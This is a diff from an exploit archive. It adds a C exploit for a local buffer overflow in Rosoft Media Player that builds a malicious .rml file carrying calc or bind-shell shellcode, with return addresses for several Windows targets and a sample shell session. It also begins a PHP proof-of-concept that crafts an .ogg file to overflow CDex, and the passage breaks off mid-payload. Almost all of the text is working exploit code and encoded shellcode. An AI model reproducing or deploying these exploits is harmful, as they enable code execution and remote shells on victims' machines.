"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34" - "\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74" - "\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46" - "\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71" - "\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e" - "\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30" - "\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58" - "\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d" - "\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51" - "\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e" - "\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51" - "\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41" - "\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70" - "\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70" - "\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c" - "\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69" - "\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69" - "\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f" - "\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b" - "\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41" - "\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74" - "\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30" - "\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62" - "\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e" - "\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63" - "\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46" - "\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48" - "\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b" - "\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50" 
- "\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49" - "\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49" - "\x6f\x58\x56\x49\x6f\x78\x50\x61"; - -struct adresses - {char *platform; - unsigned long addr; - } - systems[]= - { - {"[*]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB }, - {"[*]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569 }, - {"[*]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B }, - {"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D }, - {NULL }, - }; - -char NOP1[]="\x90\x90\x90\x90";// n0t working -char NOP2[]="\x90\x90\x90\x90\x90\x90\x90\x90"; -int main(int argc,char *argv[]){ - FILE *s; - unsigned char *buffer; - unsigned int RET= systems[atoi(argv[2])].addr; - unsigned char bchars[]="\xF0\xFF\xFD\x7F"; - int i; - int number; - int offset=0; - - if (argc <2){ - system("cls"); - printf("Coded By SimO-s0fT\n"); - for(i=0;systems[i].platform;i++) - printf("%d \t\t %s\n",i,systems[i].platform); - printf("USAGE : \n\t"); - printf(argv[0]); - printf(".exe "); - printf("file.rml "); - printf("platform\n"); - printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }\n"); - } - if ((s=fopen(argv[1],"wb"))==NULL){ - perror("failed..."); - exit(0); - } - printf("[1] execute calc.exe\n"); - printf("[2] execute bindshell LPORT=7777\n"); - printf(" Choose a neumber : "); - scanf("%d",&number); - switch(number){ - case 1: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1)); - memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1)); - offset=OFFSET; - memcpy(buffer+offset,bchars,strlen(bchars)); - offset+=strlen(bchars); - memcpy(buffer+offset,NOP1,strlen(NOP1)); - offset+=strlen(NOP1); - memcpy(buffer+offset,&RET,4); - offset+=4; - memcpy(buffer+offset,NOP2,strlen(NOP2)); - offset+=strlen(NOP2); - memcpy(buffer+offset,scode1,strlen(scode1)); - offset+=strlen(scode1); - fputs(buffer,s); - fclose(s); - printf("%s 
has been created!",argv[1]); - free(buffer); - break; - - case 2: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2)); - memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2)); - offset=OFFSET; - memcpy(buffer+offset,bchars,strlen(bchars)); - offset+=strlen(bchars); - memcpy(buffer+offset,NOP1,strlen(NOP1)); - offset+=strlen(NOP1); - memcpy(buffer+offset,&RET,4); - offset+=4; - memcpy(buffer+offset,NOP2,strlen(NOP2)); - offset+=strlen(NOP2); - memcpy(buffer+offset,scode2,strlen(scode2)); - offset+=strlen(scode2); - fputs(buffer,s); - fclose(s); - printf("%s has been created!",argv[1]); - free(buffer); - break; - - } - - return 0; -} - -// milw0rm.com [2009-03-16] +/* rsmpf.c +* Rosoft media player free local buffer overflow Exploit multi targets +* Coded By : +* SimO-s0fT (Maroc-anti-connexion@hotmail.com) +* thanks To : Stack & fl0 fl0w & SKD +* and special thanks to str0ke for his advices and support ( you are the best brotha ) +* example : +* ########################################################################################## + # Coded By SimO-s0fT # +* # 0 [*]Microsoft Windows Trust SP3 (Frensh):ESP # +* # 1 [*]Microsoft Windows Trust SP2 (Frensh):ESP # +* # 2 [*]Microsoft Windows XP SP3 (Frensh) : ESP # +* # 3 [*]Microsoft Windows XP SP2 (Frensh) : ESP # +* # USAGE : # +* # exploit1.exe file.rml platform # +* # more information contact me { Maroc-anti-connexion[at]hotmail[dot]com } # +* # failed...: No such file or directory # +* # C:\Documents and Settings\The Fanopsis\Bureau>exploit1 simo.rml 0 # +* # [1] execute calc.exe # +* # [2] execute bindshell LPORT=7777 # +* # Choose a neumber : 2 # +* # simo.rml has been created! # +* # C:\Documents and Settings\The Fanopsis\Bureau>telnet 41.250.22.124 7777 # +* # Console - Windows Trust 3.0 (Service Pack 3: v55 # +* # # +* # (C) 1985-2008 Microsoft Corp. 
# +* # # +* # # +* # C:\Documents and Settings\The Fanopsis\Bureau> # +* ########################################################################################## +* +********************************************************************************************************/ +#include <stdio.h> +#include <string.h> +#include <stdlib.h> +#define OFFSET 4096 + +// calc (pour tester l'exploit) +char scode1[]= + "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9" + "\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e" + "\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12" + "\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56" + "\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d" + "\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f" + "\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0" + "\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33" + "\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f" + "\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23" + "\xcc\x21\xdb\x5b"; +//bind shell LPORT 7777 +char scode2[] = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" + "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32" + "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32" + "\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35" + "\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e" + "\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65" + "\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46" + "\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b" + "\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48" + "\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b" + "\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46" + 
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34" + "\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74" + "\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46" + "\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71" + "\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e" + "\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30" + "\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58" + "\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d" + "\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51" + "\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e" + "\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51" + "\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41" + "\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70" + "\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70" + "\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c" + "\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69" + "\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69" + "\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f" + "\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b" + "\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41" + "\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74" + "\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30" + "\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62" + "\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e" + "\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63" + "\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46" + "\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48" + "\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b" + "\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50" 
+ "\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
+ "\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
+ "\x6f\x58\x56\x49\x6f\x78\x50\x61";
+
+struct adresses
+ {char *platform;
+ unsigned long addr;
+ }
+ systems[]=
+ {
+ {"[*]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB },
+ {"[*]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569 },
+ {"[*]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B },
+ {"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D },
+ {NULL },
+ };
+
+char NOP1[]="\x90\x90\x90\x90";// n0t working
+char NOP2[]="\x90\x90\x90\x90\x90\x90\x90\x90";
+int main(int argc,char *argv[]){
+ FILE *s;
+ unsigned char *buffer;
+ unsigned int RET= systems[atoi(argv[2])].addr;
+ unsigned char bchars[]="\xF0\xFF\xFD\x7F";
+ int i;
+ int number;
+ int offset=0;
+
+ if (argc <2){
+ system("cls");
+ printf("Coded By SimO-s0fT\n");
+ for(i=0;systems[i].platform;i++)
+ printf("%d \t\t %s\n",i,systems[i].platform);
+ printf("USAGE : \n\t");
+ printf(argv[0]);
+ printf(".exe ");
+ printf("file.rml ");
+ printf("platform\n");
+ printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }\n");
+ }
+ if ((s=fopen(argv[1],"wb"))==NULL){
+ perror("failed...");
+ exit(0);
+ }
+ printf("[1] execute calc.exe\n");
+ printf("[2] execute bindshell LPORT=7777\n");
+ printf(" Choose a neumber : ");
+ scanf("%d",&number);
+ switch(number){
+ case 1: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
+ memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
+ offset=OFFSET;
+ memcpy(buffer+offset,bchars,strlen(bchars));
+ offset+=strlen(bchars);
+ memcpy(buffer+offset,NOP1,strlen(NOP1));
+ offset+=strlen(NOP1);
+ memcpy(buffer+offset,&RET,4);
+ offset+=4;
+ memcpy(buffer+offset,NOP2,strlen(NOP2));
+ offset+=strlen(NOP2);
+ memcpy(buffer+offset,scode1,strlen(scode1));
+ offset+=strlen(scode1);
+ fputs(buffer,s);
+ fclose(s);
+ printf("%s 
has been created!",argv[1]);
+ free(buffer);
+ break;
+
+ case 2: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
+ memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
+ offset=OFFSET;
+ memcpy(buffer+offset,bchars,strlen(bchars));
+ offset+=strlen(bchars);
+ memcpy(buffer+offset,NOP1,strlen(NOP1));
+ offset+=strlen(NOP1);
+ memcpy(buffer+offset,&RET,4);
+ offset+=4;
+ memcpy(buffer+offset,NOP2,strlen(NOP2));
+ offset+=strlen(NOP2);
+ memcpy(buffer+offset,scode2,strlen(scode2));
+ offset+=strlen(scode2);
+ fputs(buffer,s);
+ fclose(s);
+ printf("%s has been created!",argv[1]);
+ free(buffer);
+ break;
+
+ }
+
+ return 0;
+}
+
+// milw0rm.com [2009-03-16]
diff --git a/platforms/windows/local/8231.php b/platforms/windows/local/8231.php
index 2e1b42461..cdfe11fe8 100755
--- a/platforms/windows/local/8231.php
+++ b/platforms/windows/local/8231.php
@@ -1,436 +1,436 @@
-<?PHP
-/*
-CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3)
-by Nine:Situations:Group::Pyrokinesis
-
-software site: http://cdexos.sourceforge.net/
-our site: http://retrogod.altervista.org/
-
-A very reliable buffer overflow exists in the way cdex process Ogg Vorbis Info
-headers.
-usage:
-c:\php\php 9sg_cdex_local.php
-evil.ogg is created, now navigate:
-Main Menu-> Tools -> Media file Player -> Select files -> Browse to a folder ->
--> Open -> Play evil.ogg
-*/
-
-$_frgmnt1 =
-"OggS". //for what I understood ... beginning
-"\x00". //stream_structure_version
-"\x02". //header_type_flag
-"\x00\x00\x00\x00\x00\x00\x00\x00". //granular_position
-"\x66\x07\x00\x00". //bitstream_serial_number
-"\x00\x00\x00\x00". //page_sequence_number
-"\x92\xa8\x3b\xd9". //CRC_checksum
-"\x01". //number_page_segments
-"\x1e". //segments_table
-"\x01".
-"vorbis".
-"\x00\x00\x00\x00\x02\x44\xac\x00\x00\x00\x00\x00\x00".
-"\x00\x71\x02\x00\x00\x00\x00\x00\xb8\x01";
-
-$_frgmnt2 =
-"OggS".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x07".
-"\x00\x00\x01\x00\x00\x00".
-"\x00\x00\x00\x00". //set crc to 0, after calculate the real crc
-"\x51\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\x93\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\xff\x03vorbis\x1d\x00\x00".
-"\x00Xiph.Org\x20libVor".
-"bis\x20I\x2020040629\x03\x00".
-"\x00\x00\x07\x20\x00\x00".
-"ARTIST=";
-
-$payload_len=8192;
-
-//msg box shellcode saying "hey" ...
-//replace with your own, the script recalculates the CRC checksum
-$scode =
-"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a".
-"\xbb\x7b\x1d\x80\x7c". //LoadLibraryA at 0x7c801d7b in kernel32.dll xpsp3
-"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50".
-"\xbb\x30\xae\x80\x7c". //GetProcAddress at 0x7c80ae30 in kernel32.dll
-"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51".
-"\x51\x52\xff\xd0\x31\xd2\x50".
-"\xb8\xfa\xca\x81\x7c". //ExitProcess at 0x7c81cafa in kernel32.dll
-"\xff\xd0\xe8\xc4\xff".
-"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff".
-"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff".
-"\xff\x48\x65\x79\x4e";
-
-$_boom=str_repeat("\x90",2048 - strlen($scode)).$scode.
-"\x67\x86\x86\x7c". //eip -> 0x7C868667 call esp kernel32.dll
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
-"\x83\xec\x7f". // sub esp,07f
-"\x83\xec\x7f". //..
-"\x83\xec\x7f". //..
-"\x83\xec\x7f". //..
-"\x83\xec\x7f". //..
-"\xff\xd4". //call esp
-"\x90\x90\x90".
-"\x00\x00\x00\x00";//if replaced with non-zero chars, overwrites seh ... do not touch
-
-$_frgmnt2.=$_boom."\x90\x90\x90\x90\x90\x90\x90\x90".str_repeat("\x90",$payload_len - strlen($_boom) - 8);
-$_frgmnt2.="\x0a\x20\x00\x00".
-"PERFORMER=";
-$_frgmnt2.=str_repeat("\x90",$payload_len);
-$_frgmnt2.="\x09\x00\x00\x00".
-"DATE=2009".
-"\x01\x05".
-"vorbis".
-"\x29\x42\x43\x56\x01\x00\x08\x00\x00\x00\x31\x4c\x20\xc5\x80\xd0".
-"\x90\x55\x00\x00\x10\x00\x00".
-"\x60\x24\x29\x0e\x93\x66\x49\x29\xa5".
-"\x94\xa1\x28\x79\x98\x94\x48\x49\x29\xa5\x94\xc5\x30\x89\x98\x94".
-"\x89\xc5\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x20".
-"\x34\x64\x15\x00\x00\x04\x00\x80\x28\x09\x8e\xa3\xe6\x49\x6a\xce".
-"\x39\x67\x18\x27\x8e\x72\xa0\x39\x69\x4e\x38\xa7\x20\x07\x8a\x51".
-"\xe0\x39\x09\xc2\xf5\x26\x63\x6e\xa6\xb4\xa6\x6b\x6e\xce\x29\x25".
-"\x08\x0d\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21".
-"\x85\x14\x62\x88\x21\x86\x18\x62\x88\x21\x87\x1c\x72\xc8\x21\xa7".
-"\x9c\x72\x0a\x2a\xa8\xa0\x82\x0a\x32\xc8\x20\x83\x4c\x32\xe9\xa4".
-"\x93\x4e\x3a\xe9\xa8\xa3\x8e\x3a\xea\x28\xb4\xd0\x42\x0b\x2d\xb4".
-"\xd2\x4a\x4c\x31\xd5\x56\x63\xae\xbd\x06\x5d\x7c\x73\xce\x39\xe7".
-"\x9c\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x20\x00". -"\x00\x04\x42\x06\x19\x64\x10\x42\x08\x21\x85\x14\x52\x88\x29\xa6". -"\x98\x72\x0a\x32\xc8\x80\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00". -"\x00\x00\x47\x91\x14\x49\xb1\x14\xcb\xb1\x1c\xcd\xd1\x24\x4f\xf2". -"\x2c\x51\x13\x35\xd1\x33\x45\x53\x54\x4d\x55\x55\x55\x55\x75\x5d". -"\x57\x76\x65\xd7\x76\x75\xd7\x76\x7d\x59\x98\x85\x5b\xb8\x7d\x59". -"\xb8\x85\x5b\xd8\x85\x5d\xf7\x85\x61\x18\x86\x61\x18\x86\x61\x18". -"\x86\x61\xf8\x7d\xdf\xf7\x7d\xdf\xf7\x7d\x20\x34\x64\x15\x00\x20". -"\x01\x00\xa0\x23\x39\x96\xe3\x29\xa2\x22\x1a\xa2\xe2\x39\xa2\x03". -"\x84\x86\xac\x02\x00\x64\x00\x00\x04\x00\x20\x09\x92\x22\x29\x92". -"\xa3\x49\xa6\x66\x6a\xae\x69\x9b\xb6\x68\xab\xb6\x6d\xcb\xb2\x2c". -"\xcb\xb2\x0c\x84\x86\xac\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00". -"\x00\xa0\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a". -"\xa6\x69\x9a\xa6\x69\x9a\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65". -"\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59". -"\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xc8\x2a". -"\x00\x40\x02\x00\x40\xc7\x71\x1c\xc7\x71\x24\x45\x52\x24\xc7\x72". -"\x2c\x07\x08\x0d\x59\x05\x00\xc8\x00\x00\x08\x00\x40\x52\x2c\xc5". -"\x72\x34\x47\x73\x34\xc7\x73\x3c\xc7\x73\x3c\x47\x74\x44\xc9\x94". -"\x4c\xcd\xf4\x4c\x0f\x08\x0d\x59\x05\x00\x00\x02\x00\x08\x00\x00". -"\x00\x00\x00\x40\x31\x1c\xc5\x71\x1c\xc9\xd1\x24\x4f\x52\x2d\xd3". -"\x72\x35\x57\x73\x3d\xd7\x73\x4d\xd7\x75\x5d\x57\x55\x55\x55\x55". -"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55". -"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x81\xd0". -"\x90\x55\x00\x00\x04\x00\x00\x21\x9d\x66\x96\x6a\x80\x08\x33\x90". -"\x61\x20\x34\x64\x15\x00\x80\x00\x00\x00\x18\xa1\x08\x43\x0c\x08". -"\x0d\x59\x05\x00\x00\x04\x00\x00\x88\xa1\xe4\x20\x9a\xd0\x9a\xf3". -"\xcd\x39\x0e\x9a\xe5\xa0\xa9\x14\x9b\xd3\xc1\x89\x54\x9b\x27\xb9". 
-"\xa9\x98\x9b\x73\xce\x39\xe7\x9c\x6c\xce\x19\xe3\x9c\x73\xce\x29". -"\xca\x99\xc5\xa0\x99\xd0\x9a\x73\xce\x49\x0c\x9a\xa5\xa0\x99\xd0". -"\x9a\x73\xce\x79\x12\x9b\x07\xad\xa9\xd2\x9a\x73\xce\x19\xe7\x9c". -"\x0e\xc6\x19\x61\x9c\x73\xce\x69\xd2\x9a\x07\xa9\xd9\x58\x9b\x73". -"\xce\x59\xd0\x9a\xe6\xa8\xb9\x14\x9b\x73\xce\x89\x94\x9b\x27\xb5". -"\xb9\x54\x9b\x73\xce\x39\xe7\x9c\x73\xce\x39\xe7\x9c\x73\xce\xa9". -"\x5e\x9c\xce\xc1\x39\xe1\x9c\x73\xce\x89\xda\x9b\x6b\xb9\x09\x5d". -"\x9c\x73\xce\xf9\x64\x9c\xee\xcd\x09\xe1\x9c\x73\xce\x39\xe7\x9c". -"\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x40\x00\x00". -"\x04\x61\xd8\x18\xc6\x9d\x82\x20\x7d\x8e\x06\x62\x14\x21\xa6\x21". -"\x93\x1e\x74\x8f\x0e\x93\xa0\x31\xc8\x29\xa4\x1e\x8d\x8e\x46\x4a". -"\xa9\x83\x50\x52\x19\x27\xa5\x74\x82\xd0\x90\x55\x00\x00\x20\x00". -"\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21". -"\x86\x18\x62\x88\x21\xa7\x9c\x72\x0a\x2a\xa8\xa4\x92\x8a\x2a\xca". -"\x28\xb3\xcc\x32\xcb\x2c\xb3\xcc\x32\xcb\xac\xc3\xce\x3a\xeb\xb0". -"\xc3\x10\x43\x0c\x31\xb4\xd2\x4a\x2c\x35\xd5\x56\x63\x8d\xb5\xe6". -"\x9e\x73\xae\x39\x48\x6b\xa5\xb5\xd6\x5a\x2b\xa5\x94\x52\x4a\x29". -"\xa5\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19". -"\x85\x14\x52\x48\x21\x86\x98\x72\xca\x29\xa7\xa0\x82\x0a\x08\x0d". -"\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\xf0\x24\xcf\x11\x1d\xd1". -"\x11\x1d\xd1\x11\x1d\xd1\x11\x1d\xd1\x11\x1d\xcf\xf1\x1c\x51\x12". -"\x25\x51\x12\x25\xd1\x32\x2d\x53\x33\x3d\x55\x54\x55\x57\x76\x6d". -"\x59\x97\x75\xdb\xb7\x85\x5d\xd8\x75\xdf\xd7\x7d\xdf\xd7\x8d\x5f". -"\x17\x86\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59". -"\x96\x65\x09\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84". -"\x14\x52\x48\x21\x85\x94\x62\x8c\x31\xc7\x9c\x83\x4e\x42\x09\x81". -"\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x47\x71\x14\xc7". -"\x91\x1c\xc9\x91\x24\x4b\xb2\x24\x4d\xd2\x2c\xcd\xf2\x34\x4f\xf3". 
